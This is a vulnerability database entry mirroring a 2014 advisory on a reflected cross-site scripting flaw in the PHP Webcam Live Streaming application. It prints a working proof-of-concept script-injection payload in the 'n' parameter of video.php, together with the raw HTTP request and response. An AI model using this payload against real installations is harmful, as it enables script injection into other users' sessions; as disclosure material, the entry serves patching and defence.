Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PHP Live Streaming Cross Site Scripting

🗓️ 09 Feb 2014 00:00:00Reported by TUNISIAN CYBERType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

PHP Webcam Live Streaming XSS Vulnerability. Provides web based live video streaming with chat, user list, and HTML embed code. Vulnerable to XSS

Code
`[+] Author: TUNISIAN CYBER  
[+] Exploit Title: PHP Webcam Live Streaming XSS Vulnerability  
[+] Date: 07-02-2014  
[+] Category: WebApp  
[+] Google Dork: :  
[+] Tested on: KaliLinux  
[+] Vendor: http://sourceforge.net/projects/phplivestream/  
[+] Friendly Sites: na3il.com,th3-creative.com  
###############################################################  
+Description:  
VideoWhisper Live Streaming provides web based live video streaming (from webcam or similar sources).   
  
Live Streaming key features:  
+ 1 to many 1 way video streaming  
+ Live chat for viewers  
+ User list with online participants  
+ Channel title  
+ HTML embed code to publish video channel  
+ P2P group streaming support  
+ Session timer and control with scripts  
+ 100% web based for clients   
  
  
The php edition is the easiest choice to setup and run the Live Streaming application on a website.  
Also to integrate with any php script or content management system that does not have a ready made integration, yet.  
  
PHP Live Streaming Edition Highlights:  
+ Create Live Video Channels  
+ Broadcast Live Video from Browser  
+ Share Channels Link/Embed Code  
+ Limit Total Use Time by Channel  
+ Simple Setup  
+ Easy to Install  
+ Full PHP Source Code  
+ Easy to Integrate   
  
+Exploit:  
PHP Webcam Live Streaming suffers from an XSS vulnerability  
  
+HTTP Header:  
Request:  
GET /ls_php/video.php?n=Studio195</title><ScRiPt%20>prompt(956046)</ScRiPt> HTTP/1.1  
Referer: http://127.0.0.1:80/ls_php/  
Host: 127.0.0.1  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36  
Accept: */*  
  
Response:  
HTTP/1.1 200 OK  
Date: Fri, 07 Feb 2014 20:48:26 GMT  
Server: Apache/2.2.8 (Win32) PHP/5.2.6  
X-Powered-By: PHP/5.2.6  
Content-Length: 900  
Keep-Alive: timeout=5, max=75  
Connection: Keep-Alive  
Content-Type: text/html; charset=UTF-8  
  
+PoC:(Localtest)  
127.O.O.1 /ls_php/video.php?n=Studio195</title><ScRiPt%20>prompt(956046)</ScRiPt>  
http://oi62.tinypic.com/f3tc89.jpg  
########################################################################################  
Greets to: XMaX-tn, N43il HacK3r, XtechSEt  
Sec4Ever Members:  
DamaneDz  
UzunDz  
GEOIX  
########################################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Feb 2014 00:00Current
7.4High risk
Vulners AI Score7.4
phpwebcamlive streamingxssvulnerabilitywebappvideochathtmlintegration
22